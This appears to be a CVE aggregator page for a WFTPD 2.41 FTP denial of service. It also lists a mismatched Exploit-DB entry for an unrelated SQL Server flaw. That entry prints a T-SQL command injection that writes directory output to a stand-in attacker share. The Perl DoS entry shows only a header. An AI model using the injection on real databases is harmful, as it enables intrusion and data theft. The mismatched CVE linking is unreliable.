CVE-2000-0644
published 2000-07-21CVE-2000-0644: WFTPD and WFTPD Pro 2.41 allows remote attackers to cause a denial of service by executing a STAT command while the LIST command is still executing.
PriorityP418medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
7.30%
93.6th percentile
WFTPD and WFTPD Pro 2.41 allows remote attackers to cause a denial of service by executing a STAT command while the LIST command is still executing.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| texas_imperial_software | wftpd | — | — |
| texas_imperial_software | wftpd | — | — |
| texas_imperial_software | wftpd | — | — |
| texas_imperial_software | wftpd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow
exploitdb·2002-07-25
CVE-2002-0644 Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow
Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow
---
source: https://www.securityfocus.com/bid/5307/info
Microsoft SQL Server 2000 includes utilities called Database Consistency Checkers (DBCC). Several of these programs contain identical buffer overflows that, when exploited, could allow an attacker to execute arbitrary code with the privilege level of the SQL Server service account.
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
Exploit-DB
WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service
exploitdb·2000-07-21
CVE-2000-0644 WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service
WFTPD 2.4.1RC11 - 'STAT'/'LIST' Denial of Service
---
source: https://www.securityfocus.com/bid/1506/info
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# -----------------------------
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.htmlhttp://www.osvdb.org/1477http://www.securityfocus.com/bid/1506https://exchange.xforce.ibmcloud.com/vulnerabilities/5003http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.htmlhttp://www.osvdb.org/1477http://www.securityfocus.com/bid/1506https://exchange.xforce.ibmcloud.com/vulnerabilities/5003
2000-07-21
Published